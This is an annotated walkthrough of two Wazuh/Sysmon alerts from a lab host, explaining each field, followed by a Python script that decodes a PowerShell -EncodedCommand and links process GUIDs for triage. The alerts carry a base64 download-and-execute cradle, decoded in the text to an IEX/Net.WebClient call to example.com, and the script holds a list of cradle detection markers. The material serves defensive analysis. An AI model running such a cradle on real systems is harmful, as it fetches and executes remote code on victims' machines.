UtcTime: 2025-04-24 22:57:08.997
ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00}
ProcessId: 16876
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0oi5rz3g.woj.ps1
CreationUtcTime: 2025-04-24 22:57:08.995
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:08.997 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c3-680a-140d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0oi5rz3g.woj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:08.995 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 142 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535433.2988404 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the record. Sysmon here, so eventID below is a Sysmon ID, not a Security-log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; stable even when the service is installed under another name, so filter on it rather than on the name.
data.win.system.eventID: 1 Sysmon event ID, not a classic Security ID: 1 = Process Create, 11 = FileCreate. Learn the Sysmon set (1, 3, 7, 8, 10, 11, 13, 22) alongside the big Security ones (4624, 4688).
data.win.system.version: 5 Schema version of this event ID's payload. Fields get added in higher versions, so decoders and rules keyed on field names depend on it.
data.win.system.level: 4 Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational. Sysmon logs almost everything at 4, so severity comes from the rule, not from here.
data.win.system.task: 1 Windows task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:11.4950021Z When the record was written to the channel, about 1.3 s after the utcTime at which the process actually started. Use utcTime for ordering.
data.win.system.eventRecordID: 351211 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process in the alert (that one is data.win.eventdata.processId).
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; what you open in Event Viewer or query with wevtutil/Get-WinEvent.
data.win.system.computer: Attacker Hostname taken from the event itself. Should match agent.name; a mismatch points to forwarded events or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:10.231
ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00}
ProcessId: 8744
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00}
ParentProcessId: 16876
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Full rendered Sysmon message; every line is parsed again below as data.win.eventdata.*. CommandLine and ParentCommandLine are identical, so each powershell.exe is relaunching a copy of itself with the same arguments, which fits rule.firedtimes being in the hundreds.
data.win.eventdata.utcTime: 2025-04-24 22:57:10.231 When Sysmon saw the process start, in UTC. Use this, not data.win.system.systemTime, for timelines.
data.win.eventdata.processGuid: {94294ddc-c1c6-680a-160d-000000000e00} Sysmon's unique ID for the new process. PIDs get reused, GUIDs don't, so pivot on this. The EID 11 alert that follows carries this same GUID: that is a file this process wrote.
data.win.eventdata.processId: 8744 Windows PID of the new process. Reused after exit, so pair it with processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable. Doubled backslashes are JSON escaping from the decoder.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the PE resource of the image. Helps spot old or sideloaded copies of a system binary.
data.win.eventdata.description: Windows PowerShell Description string from the PE resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE resource.
data.win.eventdata.company: Microsoft Corporation Company name from the PE resource. Anyone can compile these strings into a binary, so trust them only together with Hashes.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the PE. It survives renaming on disk, so compare it with image to catch renamed copies of a binary.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line; \" and \\ are JSON escaping. The value after -EncodedCommand is base64 of a UTF-16LE string, so decode it as UTF-16, not UTF-8. Here it decodes to a one-line download-and-execute cradle: IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). -NoProfile and -NoLogo are typical of scripted rather than interactive use.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as, DOMAIN\user. The domain part is the hostname, so a local account.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's ID for the logon session; every process started in that session carries the same value.
data.win.eventdata.logonId: 0x26584 Windows logon session ID. It matches the Logon ID in Security 4624/4688 events, so use it to find the logon that started this session.
data.win.eventdata.terminalSessionId: 1 Windows session number: 0 is services, 1 and above are interactive logons. 1 here means a console or RDP session, not a service.
data.win.eventdata.integrityLevel: Medium Token integrity level. Medium is a standard, non-elevated user; High is an elevated admin; System is a service. Medium means no privilege escalation has happened yet.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the image file, algorithms per the Sysmon config (SHA256 here). Check it against a known-good powershell.exe of this build before trusting the Company/Product strings.
data.win.eventdata.parentProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} Sysmon GUID of the parent; pivot on it to get the parent's own EID 1. It is the same process that wrote the __PSScriptPolicyTest file in the preceding alert.
data.win.eventdata.parentProcessId: 16876 Parent PID. Reused after exit, so pair it with parentProcessGuid.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent's executable. powershell.exe spawning powershell.exe is the pattern this rule keys on.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line. Identical to commandLine above: the same encoded cradle, relaunched.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent ran as; same local account as the child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 146 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535433.2996471 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the record. Sysmon here, so eventID below is a Sysmon ID, not a Security-log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; stable even when the service is installed under another name, so filter on it rather than on the name.
data.win.system.eventID: 11 Sysmon event ID, not a classic Security ID: 11 = FileCreate (1 = Process Create). The rule group sysmon_eid11_detections is keyed on this.
data.win.system.version: 2 Schema version of this event ID's payload; EID 11 has fewer revisions than EID 1.
data.win.system.level: 4 Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational. Sysmon logs almost everything at 4, so severity comes from the rule.
data.win.system.task: 11 Windows task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:11.7142281Z When the record was written to the channel, a few tens of milliseconds after the utcTime of the file write. Use utcTime for ordering.
data.win.system.eventRecordID: 351212 Incremental log record number – handy for timeline order. One after the EID 1 record above, so nothing was logged in between.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process in the alert (that one is data.win.eventdata.processId).
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record; same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in; what you open in Event Viewer or query with wevtutil/Get-WinEvent.
data.win.system.computer: Attacker Hostname taken from the event itself. Should match agent.name; a mismatch points to forwarded events or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:11.664
ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00}
ProcessId: 8744
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5j1irpdl.sgx.ps1
CreationUtcTime: 2025-04-24 22:57:11.664
User: Attacker\Attcker1" Full rendered Sysmon message; parsed copies of each line follow as data.win.eventdata.*.
data.win.eventdata.utcTime: 2025-04-24 22:57:11.664 When Sysmon saw the file write, in UTC; about 1.4 s after the process in the EID 1 alert above started.
data.win.eventdata.processGuid: {94294ddc-c1c6-680a-160d-000000000e00} Sysmon's unique ID for the writing process. It matches processGuid in the EID 1 alert above, so this file was written by the powershell.exe that ran the encoded command.
data.win.eventdata.processId: 8744 Windows PID of the writing process; reused after exit, so pair it with processGuid.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the binary that created the file. Doubled backslashes are JSON escaping from the decoder.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5j1irpdl.sgx.ps1 Path of the created file. PowerShell writes __PSScriptPolicyTest_<random>.ps1 to %TEMP% at startup to probe whether AppLocker/WDAC script policy is enforced, so this hit is expected from every PowerShell launch and is not the downloaded payload. Treat it as a breadcrumb back to the EID 1 alert, not as the finding.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:11.664 Creation timestamp stored on the file. Equal to utcTime here; if it were earlier, the file already existed and was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account the writing process runs as; the domain part is the hostname, so a local account.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
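The two alerts above are best read together: decode the -EncodedCommand payload from the EID 1 command line, then use processGuid to see what that process wrote, and discount the __PSScriptPolicyTest file as PowerShell's own policy probe. The script below does exactly that as an added example; it is not part of this page or of Wazuh. The field values are copied from the alerts above, but the nested-dict layout of ALERTS, the function names and the marker list are assumptions made for the example.

```python
import base64
import re
from typing import Optional

# Base64 payload copied from the commandLine of the EID 1 alert above.
ENCODED = ("SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBk"
           "AFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA")

# Constructed excerpt of the two alerts: the EID 1 process create (rule 92057) and the
# EID 11 file create (rule 92213) from the same process. Values come from the page; the
# dict layout mirrors Wazuh's JSON alert but is an assumption for this example.
ALERTS = [
    {"rule": {"id": "92057"},
     "data": {"win": {"system": {"eventID": "1"}, "eventdata": {
         "processGuid": "{94294ddc-c1c6-680a-160d-000000000e00}",
         "parentProcessGuid": "{94294ddc-c1c3-680a-140d-000000000e00}",
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "parentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "commandLine": r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
                        r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
                        r'-NoLogo -NoProfile -EncodedCommand ' + ENCODED,
     }}}},
    {"rule": {"id": "92213"},
     "data": {"win": {"system": {"eventID": "11"}, "eventdata": {
         "processGuid": "{94294ddc-c1c6-680a-160d-000000000e00}",
         "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5j1irpdl.sgx.ps1",
     }}}},
]

# PowerShell accepts abbreviations of -EncodedCommand; -e, -ec and -enc are the common ones.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# PowerShell's own AppLocker/WDAC probe file, written to %TEMP% on every launch.
POLICY_PROBE_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)
# Substrings typical of a download-and-execute cradle (assumed list, extend as needed).
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "http")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 after -EncodedCommand (or an abbreviation), if present."""
    m = ENC_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8; re-pad in case '=' was stripped."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def cradle_markers(script: str) -> list:
    low = script.lower()
    return [m for m in CRADLE_MARKERS if m in low]


def is_policy_probe(path: str) -> bool:
    return POLICY_PROBE_RE.search(path) is not None


def files_written_by(alerts, guid: str) -> list:
    """EID 11 target files whose processGuid matches, i.e. written by that exact process."""
    return [a["data"]["win"]["eventdata"]["targetFilename"] for a in alerts
            if a["data"]["win"]["system"]["eventID"] == "11"
            and a["data"]["win"]["eventdata"]["processGuid"] == guid]


def triage(alerts) -> dict:
    """For each EID 1 alert: decoded payload, cradle markers, self-spawn flag, files written."""
    out = {}
    for a in alerts:
        if a["data"]["win"]["system"]["eventID"] != "1":
            continue
        ed = a["data"]["win"]["eventdata"]
        b64 = extract_encoded_command(ed["commandLine"])
        decoded = decode_encoded_command(b64) if b64 else ""
        files = files_written_by(alerts, ed["processGuid"])
        out[ed["processGuid"]] = {
            "decoded": decoded,
            "markers": cradle_markers(decoded),
            "self_spawn": ed["image"].lower() == ed["parentImage"].lower(),
            "files": files,
            # Anything left here was not PowerShell's own probe and deserves a look.
            "unexplained_files": [f for f in files if not is_policy_probe(f)],
        }
    return out


if __name__ == "__main__":
    for guid, r in triage(ALERTS).items():
        print(guid)
        print("  decoded:", r["decoded"])
        print("  markers:", r["markers"], "self-spawn:", r["self_spawn"])
        print("  unexplained files:", r["unexplained_files"])
```

Run against the page's values, triage() reports the decoded cradle, four markers hit, a self-spawn, and no unexplained files: the only EID 11 write is the policy probe, so the EID 1 alert is the one to chase, starting from parentProcessGuid.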